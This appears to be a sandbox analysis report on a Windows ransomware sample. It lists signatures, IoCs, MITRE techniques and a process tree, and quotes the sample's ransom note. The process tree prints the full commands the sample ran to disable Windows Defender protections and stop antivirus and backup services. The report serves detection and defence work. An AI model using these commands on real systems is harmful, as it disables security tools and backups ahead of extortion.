1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
49s
max time network
71s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Size

175KB
MD5

da09586ba925a20faa4a2879697c9238
SHA1

ab6ca1d039ac2d54a811486d731ebf94ad61bf47
SHA256

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd
SHA512

80f8b6a17fe17192244a223c8b6618b70a19e8bd0cb5179b1b058c455e36c32f53c2e7402e25144e3bbb800c56ef0ad2ac6a363c4d1615ff1ea84a0c1ab371e1

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\ExportPush.png.crypted	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
5344	vssadmin.exe
5688	vssadmin.exe
4940	vssadmin.exe
5556	vssadmin.exe
5264	vssadmin.exe
4884	vssadmin.exe
5668	vssadmin.exe
5624	vssadmin.exe
5524	vssadmin.exe
5852	vssadmin.exe
5880	vssadmin.exe
5440	vssadmin.exe
5588	vssadmin.exe
1824	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
5304	taskkill.exe
5356	taskkill.exe
5100	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
7120	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
4000	powershell.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
4000	powershell.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
4000	powershell.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeIncreaseQuotaPrivilege	4000	powershell.exe
Token: SeSecurityPrivilege	4000	powershell.exe
Token: SeTakeOwnershipPrivilege	4000	powershell.exe
Token: SeLoadDriverPrivilege	4000	powershell.exe
Token: SeSystemProfilePrivilege	4000	powershell.exe
Token: SeSystemtimePrivilege	4000	powershell.exe
Token: SeProfSingleProcessPrivilege	4000	powershell.exe
Token: SeIncBasePriorityPrivilege	4000	powershell.exe
Token: SeCreatePagefilePrivilege	4000	powershell.exe
Token: SeBackupPrivilege	4000	powershell.exe
Token: SeRestorePrivilege	4000	powershell.exe
Token: SeShutdownPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeSystemEnvironmentPrivilege	4000	powershell.exe
Token: SeRemoteShutdownPrivilege	4000	powershell.exe
Token: SeUndockPrivilege	4000	powershell.exe
Token: SeManageVolumePrivilege	4000	powershell.exe
Token: 33	4000	powershell.exe
Token: 34	4000	powershell.exe
Token: 35	4000	powershell.exe
Token: 36	4000	powershell.exe
Token: SeDebugPrivilege	3084	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	5304	taskkill.exe
Token: SeDebugPrivilege	5100	taskkill.exe
Token: SeDebugPrivilege	5356	taskkill.exe
Token: SeBackupPrivilege	1320	vssvc.exe
Token: SeRestorePrivilege	1320	vssvc.exe
Token: SeAuditPrivilege	1320	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3812	powershell.exe
Token: SeSecurityPrivilege	3812	powershell.exe
Token: SeTakeOwnershipPrivilege	3812	powershell.exe
Token: SeLoadDriverPrivilege	3812	powershell.exe
Token: SeSystemProfilePrivilege	3812	powershell.exe
Token: SeSystemtimePrivilege	3812	powershell.exe
Token: SeProfSingleProcessPrivilege	3812	powershell.exe
Token: SeIncBasePriorityPrivilege	3812	powershell.exe
Token: SeCreatePagefilePrivilege	3812	powershell.exe
Token: SeBackupPrivilege	3812	powershell.exe
Token: SeRestorePrivilege	3812	powershell.exe
Token: SeShutdownPrivilege	3812	powershell.exe
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeSystemEnvironmentPrivilege	3812	powershell.exe
Token: SeRemoteShutdownPrivilege	3812	powershell.exe
Token: SeUndockPrivilege	3812	powershell.exe
Token: SeManageVolumePrivilege	3812	powershell.exe
Token: 33	3812	powershell.exe
Token: 34	3812	powershell.exe
Token: 35	3812	powershell.exe
Token: 36	3812	powershell.exe
Token: SeIncreaseQuotaPrivilege	3888	powershell.exe
Token: SeSecurityPrivilege	3888	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 652 wrote to memory of 4000	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	73
PID 652 wrote to memory of 4000	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	73
PID 652 wrote to memory of 3084	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	78
PID 652 wrote to memory of 3084	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	78
PID 652 wrote to memory of 2616	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	80
PID 652 wrote to memory of 2616	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	80
PID 652 wrote to memory of 3888	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	82
PID 652 wrote to memory of 3888	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	82
PID 652 wrote to memory of 2608	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	84
PID 652 wrote to memory of 2608	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	84
PID 652 wrote to memory of 2488	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	86
PID 652 wrote to memory of 2488	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	86
PID 652 wrote to memory of 3812	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	88
PID 652 wrote to memory of 3812	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	88
PID 652 wrote to memory of 3988	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	90
PID 652 wrote to memory of 3988	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	90
PID 652 wrote to memory of 2160	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	92
PID 652 wrote to memory of 2160	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	92
PID 652 wrote to memory of 1420	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	94
PID 652 wrote to memory of 1420	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	94
PID 652 wrote to memory of 4136	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	96
PID 652 wrote to memory of 4136	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	96
PID 652 wrote to memory of 4292	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	98
PID 652 wrote to memory of 4292	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	98
PID 652 wrote to memory of 4404	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	100
PID 652 wrote to memory of 4404	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	100
PID 652 wrote to memory of 4556	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	102
PID 652 wrote to memory of 4556	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	102
PID 652 wrote to memory of 4596	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	111
PID 652 wrote to memory of 4596	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	111
PID 652 wrote to memory of 4632	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	103
PID 652 wrote to memory of 4632	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	103
PID 652 wrote to memory of 4700	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	104
PID 652 wrote to memory of 4700	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	104
PID 652 wrote to memory of 4732	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	105
PID 652 wrote to memory of 4732	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	105
PID 652 wrote to memory of 4800	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	107
PID 652 wrote to memory of 4800	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	107
PID 652 wrote to memory of 4836	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	112
PID 652 wrote to memory of 4836	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	112
PID 652 wrote to memory of 4904	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	115
PID 652 wrote to memory of 4904	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	115
PID 652 wrote to memory of 4956	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	116
PID 652 wrote to memory of 4956	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	116
PID 652 wrote to memory of 4996	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	118
PID 652 wrote to memory of 4996	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	118
PID 652 wrote to memory of 5056	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	122
PID 652 wrote to memory of 5056	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	122
PID 4556 wrote to memory of 5080	4556	net.exe	121
PID 4556 wrote to memory of 5080	4556	net.exe	121
PID 4596 wrote to memory of 5092	4596	net.exe	120
PID 4596 wrote to memory of 5092	4596	net.exe	120
PID 652 wrote to memory of 4132	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	124
PID 652 wrote to memory of 4132	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	124
PID 652 wrote to memory of 4312	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	126
PID 652 wrote to memory of 4312	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	126
PID 4632 wrote to memory of 4360	4632	net.exe	128
PID 4632 wrote to memory of 4360	4632	net.exe	128
PID 652 wrote to memory of 4604	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	130
PID 652 wrote to memory of 4604	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	130
PID 4700 wrote to memory of 4740	4700	net.exe	137
PID 4700 wrote to memory of 4740	4700	net.exe	137
PID 4732 wrote to memory of 4992	4732	net.exe	136
PID 4732 wrote to memory of 4992	4732	net.exe	136

C:\Users\Admin\AppData\Local\Temp\5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:5080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:4180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5252
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:4956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:5056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5516
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:4604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5680
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:5924
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:4100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5792
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5292
- - C:\Windows\system32\net1.exe
